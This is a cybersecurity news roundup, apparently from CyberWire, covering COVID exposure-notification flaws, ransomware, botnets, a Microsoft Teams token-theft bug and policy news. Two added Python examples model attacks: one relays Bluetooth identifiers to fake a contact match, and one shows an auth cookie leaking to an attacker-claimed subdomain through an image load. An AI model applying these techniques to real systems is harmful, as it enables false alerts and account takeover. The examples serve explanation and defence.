Private companies offer COVID-19-tracking tools to governments.
Apple and Google have released a developer-focused version of their COVID-19 contact-tracing API, TechCrunch reports. Those who currently have access to the API are app developers working for public health authorities around the world, and the two companies plan to release a public version in mid-May.
The system will be opt-in and decentralized, although some observers doubt it will achieve a high enough level of participation to make a difference in slowing the spread of the virus. The Washington Post reports that nearly three in five Americans say they wouldn’t use the system being rolled out by Apple and Google. One in six Americans doesn’t own a smartphone, and half of those who do say they would decline to use such an app, largely because of privacy concerns and mistrust of Big Tech. TechCrunch observes that Apple and Google have shifted their terminology to better describe the system’s functionality, and now call the framework an “exposure notification” system rather than a “contact tracing” tool.
Meanwhile, Threatpost reports that the Electronic Frontier Foundation (EFF) has expressed concerns that Apple and Google’s exposure notification system suffers from potential flaws and vulnerabilities. The EFF warns that there’s no reliable way of ensuring that the devices sending proximity warnings are in fact the devices they’re supposed to be, and that trolling can’t be ruled out. The EFF uses the example of “a network of Bluetooth beacons set up on busy street corners that rebroadcast all the RPIDs they observe.” The organization also questions the effectiveness of the system, noting that Bluetooth wasn’t designed to detect if “two humans are experiencing an epidemiologically relevant contact,” and the technology might not be able to distinguish between two people kissing and two people sitting in traffic with their car windows rolled up.
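The rebroadcast scenario the EFF describes, as an added simulation that is not Apple/Google code and not drawn from the EFF post. It models the decentralized design only as far as the concern requires: each phone derives a rolling proximity identifier (RPI) per 10-minute interval from a per-day key, advertises it over Bluetooth, records what it hears, and later checks those records against keys uploaded by people who test positive. Two simplifications are assumptions of this example: the RPI derivation is an HMAC stand-in for the AES-based derivation in the real scheme, and the matcher allows a clock tolerance of `TOLERANCE` intervals; the keys and interval numbers are constructed.

```python
import hashlib
import hmac

TOLERANCE = 2  # intervals of clock slack the matcher accepts (assumed, not from the spec)


def derive_rpi(tek: bytes, interval: int) -> bytes:
    """Rolling proximity identifier for one 10-minute interval.
    Keyed-hash stand-in for the AES-based derivation of the real design."""
    msg = b"EN-RPI" + interval.to_bytes(4, "little")
    return hmac.new(tek, msg, hashlib.sha256).digest()[:16]


class Phone:
    def __init__(self, tek: bytes):
        self.tek = tek    # per-day key; uploaded only after a positive diagnosis
        self.seen = []    # (rpi, interval at which it was heard)

    def advertise(self, interval: int) -> bytes:
        return derive_rpi(self.tek, interval)

    def hear(self, rpi: bytes, interval: int) -> None:
        # Nothing in the 16 bytes says who sent them or from where; the radio
        # simply records whatever it received, genuine or replayed.
        self.seen.append((rpi, interval))

    def exposures(self, published_teks) -> list:
        """Intervals at which a published key explains something we heard."""
        hits = []
        for tek in published_teks:
            for rpi, when in self.seen:
                window = range(when - TOLERANCE, when + TOLERANCE + 1)
                if any(hmac.compare_digest(derive_rpi(tek, i), rpi) for i in window):
                    hits.append(when)
        return hits


def relay_scenario(relay: bool, delay: int = 0) -> list:
    """Alice and Bob are never in the same place.  With relay=True a beacon near
    Alice forwards her advertisement to a beacon near Bob, which rebroadcasts it
    `delay` intervals later (the busy-street-corner setup).  Returns the
    intervals Bob's phone flags once Alice's key is published."""
    alice = Phone(bytes(range(16)))   # constructed keys, not real TEKs
    bob = Phone(bytes(16))
    t = 100
    captured = alice.advertise(t)      # beacon A hears this near Alice
    if relay:
        bob.hear(captured, t + delay)  # beacon B replays it near Bob
    return bob.exposures([alice.tek])  # Alice reports positive and uploads her key
```

With `relay=False` Bob's phone flags nothing; with `relay=True` it flags interval 100 even though the two never met, because the RPI carries no proof of origin and the matcher has nothing but the bytes and the time to go on. The only limit on the attack in this model is the clock tolerance: a replay delayed past `TOLERANCE` intervals no longer matches, which is why a live rebroadcast network is the worrying case rather than a recording played back hours later.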
Reuters reports that at least eight surveillance and spyware companies are marketing their tools to governments for contact-tracking and quarantine enforcement. Four of these companies said they’re rolling out their products in “more than a dozen countries in Latin America, Europe and Asia,” and Israel is seeking the help of NSO Group. These tools use various location tracking methods, but they come with the same concerns about precision as Apple and Google’s Bluetooth-based system. Government-deployed surveillance tools could obviously see a much higher level of participation than an opt-in system, but such tools come with clear privacy downsides and greater potential for long-term misuse.
Read more in the CyberWire Pro Privacy Briefing.
Shade ransomware closes shop.
The operators of the Shade ransomware, also known as Troldesh, announced on GitHub that they’re shuttering their operations, ZDNet reports. They’ve also released 750,000 decryption keys and encouraged antivirus firms to develop user-friendly decryption tools. The group apologized to its victims and expressed hope that they can recover their data. Kaspersky confirmed that the keys are legitimate and has since released a free decryptor.
Shade was among the oldest and most active strains of ransomware, operating from at least 2014 until the end of 2019. It’s not clear why they’ve had an apparent change of heart. BleepingComputer observes that Shade was unusual as far as ransomware strains go, in that it didn’t avoid targeting Russia and other post-Soviet states, and was actually most active in Russia and Ukraine.
Microsoft’s view of ransomware trends.
Microsoft released a report examining ransomware operations, lending further support to the argument that all ransomware attacks should be viewed as data breaches. Microsoft warns that, while a few ransomware groups are now well-known for exfiltrating data before encrypting it in place, “almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.” Redmond also found that in targeted ransomware operations, attackers “deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt.”
The company also notes that many of these actors are still targeting hospitals and other medical organizations, particularly NetWalker and the group behind the Vatet loader. Vatet is a custom loader for Cobalt Strike, which the group has recently been using to deploy “in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families.”
Disinformation-as-a-service on the rise.
BuzzFeed reports on the increasing demand for so-called “black PR” firms that are willing to use “fake accounts, false narratives, and pseudo news websites” to push their clients’ agendas. BuzzFeed found that, of the twenty-seven disinformation campaigns that have been at least partially attributed to PR firms since 2011, nineteen took place in 2019.
Jonathan Corpus Ong from the University of Massachusetts Amherst told BuzzFeed that in the Philippines these services have grown so widespread and effective that honest PR firms are struggling to compete. Ong stated that “[t]he Philippines offers a cautionary tale for other countries for what happens when disinformation production within the PR industry has become so financially lucrative that they have moved from shady black market transactions to the professional respectability of the corporate boardroom.”
Check out the CyberWire Pro Disinformation Briefing for more.
Large cryptomining botnet hobbled.
ESET discovered and disrupted a botnet that’s been active since at least May 2019 and had infected more than 35,000 devices, more than 90% of which were located in Peru. The botnet, which ESET calls “VictoryGate,” was primarily used for cryptomining, although the researchers note that the operator could have issued and executed new malware payloads at will. The cryptomining itself was taxing and disruptive, keeping CPU usage at a consistent 90% to 99%. ESET estimates, based on its visibility, that the botnet has generated at least $6,000 worth of Monero. The botnet malware was distributed via infected USB drives, which ESET notes is a common mode of malware distribution in Latin America.
All of the botnet’s command-and-control domains were registered with the dynamic DNS provider No-IP, and No-IP promptly shut them down after being notified by ESET. This will block new victims from downloading additional payloads over the internet, but it won’t stop previously infected machines from mining Monero.
See more in the CyberWire Pro Research Briefing.
Microsoft Teams flaw could have led to widespread account takeover.
Microsoft fixed a vulnerability in its Teams communication and collaboration platform that could have allowed an attacker to use a GIF to gain access to an organization’s entire set of Teams accounts. Researchers at CyberArk found and disclosed the flaw, which stemmed from the way Teams used access tokens to allow users to view images that have been shared with them. These tokens were sent to teams.microsoft.com and any of its subdomains, and the researchers found two subdomains that were vulnerable to takeover. If an attacker could trick a user into accessing a resource on a compromised subdomain, they could intercept the user’s access token and subsequently access their Teams account data. The user wouldn’t have to visit the compromised subdomain to give up their token—they’d simply have to load an image that was hosted on it.
As a result, an attacker could send a message containing an image to a Teams user and gain access to the victim’s account as soon as they viewed the image. The attacker could then use that account as a launching pad to send the image to other accounts within the organization, gaining access to every account whose owner viewed the image. In addition to data theft or destruction, CyberArk also notes the possibility of social engineering attacks launched by an attacker with control over every employee’s account.
CyberArk reported the vulnerability to Microsoft on March 23rd. Microsoft promptly deleted the DNS records of the two subdomains, then issued a patch on April 20th.
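Why a dangling subdomain was enough: a cookie scoped to the parent domain is attached to requests for any host beneath it, including one an attacker has claimed, and an image tag is all it takes to make the victim’s client issue such a request. The following is an added example built on the standard-library cookie jar, not code from CyberArk’s report; the cookie name `authtoken`, the placeholder value, and the hostnames are constructed to mirror the scenario. The host-only variant uses `DomainStrictNonDomain` to approximate the RFC 6265 host-only rule that browsers apply, which is an assumption about the model rather than a statement about how Teams sets its cookies.

```python
from http.cookiejar import Cookie, CookieJar, DefaultCookiePolicy
from urllib.request import Request


def make_cookie(name: str, value: str, domain: str, host_only: bool = False) -> Cookie:
    """Build a Netscape-style cookie as a Set-Cookie header would.
    host_only=True models a cookie that carried no Domain attribute."""
    return Cookie(
        version=0, name=name, value=value,
        port=None, port_specified=False,
        domain=domain, domain_specified=not host_only,
        domain_initial_dot=domain.startswith("."),
        path="/", path_specified=True,
        secure=True, expires=None, discard=True,
        comment=None, comment_url=None, rest={},
    )


def cookie_header_for(jar: CookieJar, url: str):
    """The Cookie header the jar would attach to a request for url, or None."""
    req = Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


def leaked_to(url: str) -> bool:
    """Parent-domain cookie (Domain=.teams.microsoft.com, as an assumed
    scope): is it sent along with a request for url?"""
    jar = CookieJar()
    jar.set_cookie(make_cookie("authtoken", "PLACEHOLDER", ".teams.microsoft.com"))
    return cookie_header_for(jar, url) is not None


def leaked_to_host_only(url: str) -> bool:
    """Same check for a host-only cookie under a policy that enforces
    host-only semantics (the default http.cookiejar policy is laxer)."""
    policy = DefaultCookiePolicy(strict_ns_domain=DefaultCookiePolicy.DomainStrictNonDomain)
    jar = CookieJar(policy)
    jar.set_cookie(make_cookie("authtoken", "PLACEHOLDER", "teams.microsoft.com", host_only=True))
    return cookie_header_for(jar, url) is not None


# An <img src="https://takeover.teams.microsoft.com/pixel.gif"> in a chat
# message makes the victim's client fetch this URL; with the parent-scoped
# cookie the token rides along to the attacker-controlled host.
ATTACKER_IMAGE = "https://takeover.teams.microsoft.com/pixel.gif"
```

Two checks a practitioner would want from this model: the parent-scoped cookie goes to the attacker’s subdomain but not to a lookalike such as `teams.microsoft.com.example.net`, and the `Secure` flag keeps it off plain `http://` requests. Narrowing the cookie to the exact host is a defence in depth, but the fix Microsoft actually applied was the one that removes the root cause: taking down the dangling DNS records so that no subdomain under the cookie’s scope can be claimed.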
Sophos patches an actively exploited XG Firewall vulnerability.
Sophos released an emergency patch for an actively exploited vulnerability in its XG enterprise firewall, ZDNet reports. Sophos explained that the “attack used a previously unknown pre-auth SQL injection vulnerability to gain access to exposed XG devices. It was designed to exfiltrate XG Firewall-resident data….The data exfiltrated for any impacted firewall includes all local usernames and hashed passwords of any local user accounts. For example, this includes local device admins, user portal accounts, and accounts used for remote access.” Users will be notified via the XG management interface whether or not their devices were compromised.
Crime and punishment.
The US Federal Bureau of Investigation says that reported cases of cybercrime have risen dramatically during the pandemic. How dramatically? The FBI’s Internet Crime Complaint Center (IC3) normally receives about a thousand complaints a day. The IC3 is now logging, CyberArk observes, two to three times that number.
Courts and torts.
In new court filings, WhatsApp has accused NSO Group of being “deeply involved” in hacking 1,400 WhatsApp users, including journalists and activists, the Guardian reports. A WhatsApp engineer testified that in 720 of the cases, the spyware contained the IP address of a server belonging to QuadraNet, a company whose data centers were used by NSO. WhatsApp further claimed in its filing that “NSO used a network of computers to monitor and update Pegasus after it was implanted on users’ devices. These NSO-controlled computers served as the nerve centre through which NSO controlled its customers’ operation and use of Pegasus.”
NSO has maintained that it only sells its products to governments and that it doesn’t have any visibility into who those governments are targeting. The company disputed WhatsApp’s accusation, according to CyberScoop, asserting that NSO itself hadn’t contracted with QuadraNet and that “[i]f Pegasus messages did pass through QuadraNet servers, they would have been sent by NSO’s customers, not NSO.”
Bloomberg Law reports that mobile security software company MobileIron is suing BlackBerry for allegedly infringing on MobileIron’s patents while doling out “extortionate” royalty demands and infringement accusations against MobileIron and other companies. Cantech Letter observes that about a third of BlackBerry’s revenue comes from licensing fees, either paid willingly or as a result of litigation.
TechCrunch says LabCorp is being sued by one of its shareholders for allegedly covering up two data breaches, one discovered in May 2019 and the other reported by TechCrunch in January 2020. The lawsuit states that, “[a]mongst other reasons, demand is futile because the Board consciously disregarded its duties to provide timely notice of the Data Breaches to affected individuals, knowingly failed to make adequate public disclosures of the Data Breaches, willfully and intentionally disregarded the Company’s obligations to increase and/or establish more effective cybersecurity policies and procedures, and sought to disclaim all liability and responsibility for LabCorp patient data by, in effect, levying all accountability and remedial actions upon AMCA for the First Breach and then outright ignoring the ramifications of the Second Breach.” A LabCorp spokesperson told TechCrunch the lawsuit “will be vigorously defended.”
Policies, procurements, and agency equities.
President Trump this Friday issued an Executive Order on Securing the United States Bulk-Power System. The Executive Order expresses recognition of the degree to which foreign adversaries are interested in holding the US electrical power generation and distribution system at risk. It explicitly addresses cyber threats and vulnerabilities, but the Executive Order is also striking with respect to its concentration on safety and reliability engineering, and on the risk that a hostile foreign government could compromise hardware supply chains or engage in active sabotage.
The FCC last Friday issued Orders to Show Cause against China Unicom Americas, China Telecom Americas, ComNet, and Pacific Networks—four companies the FCC says “are ultimately subject to the ownership and control of the Chinese government.” The Orders give the companies thirty days “to explain why the Commission should not start the process of revoking their domestic and international section authorizations enabling them to operate in the United States.”
Members of Congress have asked for an explanation of the Defense Department’s plans, under consideration, to close the National Defense University’s College of Information and Cyberspace (CIC), Politico reports. Senators Mike Rounds (Republican of South Dakota) and Joe Manchin (Democrat of West Virginia) and Representatives Jim Langevin (Democrat of Rhode Island) and Elise Stefanik (Republican of New York) stated in a letter, “We believe that academic programs specializing in cyber and information warfare should not be relegated to standalone elective courses within other NDU colleges, in lieu of their full degree or certificate-granting status at the CIC.” They also noted that “any action to eliminate, subsume into another college, or institutionally diminish the CIC would require a change in law or prior explicit congressional approval.”
See the CyberWire Pro Policy Briefing for more.
Fortunes of commerce.
ICANN, the Internet Corporation for Assigned Names and Numbers, has rejected a $1.1 billion deal to sell the Public Interest Registry (PIR)—the not-for-profit organization that controls the “.org” generic top-level domain—to Ethos Capital, a for-profit investment firm. The proposed deal had been criticized by California’s Attorney General, the Executive Director of the Electronic Frontier Foundation, and several founding members of ICANN, according to Reuters. The Verge explains that opponents of the deal worried that it would destabilize the domain’s operation, and they pointed to ethical questions about a for-profit firm managing a domain widely intended for use by non-profit organizations. ICANN’s Board stated that it “finds that the public interest is better served in withholding consent as a result of various factors that create unacceptable uncertainty over the future of the third largest gTLD registry.” Ethos contends that ICANN’s decision “sets a dangerous precedent with broad industry implications,” asserting that the organization “has overstepped its purview, which is limited to ensuring routine transfers of indirect control (such as the sale of PIR) do not impact the registry’s security, stability and reliability.”
FireEye announced on Wednesday that it plans to lay off around 6% of its workforce (approximately 204 employees), which will save the company $25 million in operating costs. Channel Partners notes that the restructuring was “planned long before the COVID-19 pandemic.”
Mergers and acquisitions.
Investments and exits.
Tel Aviv-based passwordless authentication provider Secret Double Octopus has secured $15 million in Series B funding from new investors Sony Financial Ventures, KDDI, and Global Brain, as well as existing investors Jerusalem Venture Partners, Benhamou Global Ventures (BGV), Liberty Media, Iris Capital, and Yaniv Tal.
Texas-based physical threat detection platform provider Ontic has raised $12 million in a Series A round led by Felicis Ventures, with participation from existing investors Silverton Partners, Floodgate, and Village Global.
New York-based healthcare data sharing company Particle Health has raised $12 million in a Series A round led by Menlo Ventures, with participation from existing investors Collaborative Fund, Story Ventures, and Company Ventures, Crunchbase News reports.
More business news can be found in the CyberWire Pro Business Briefing.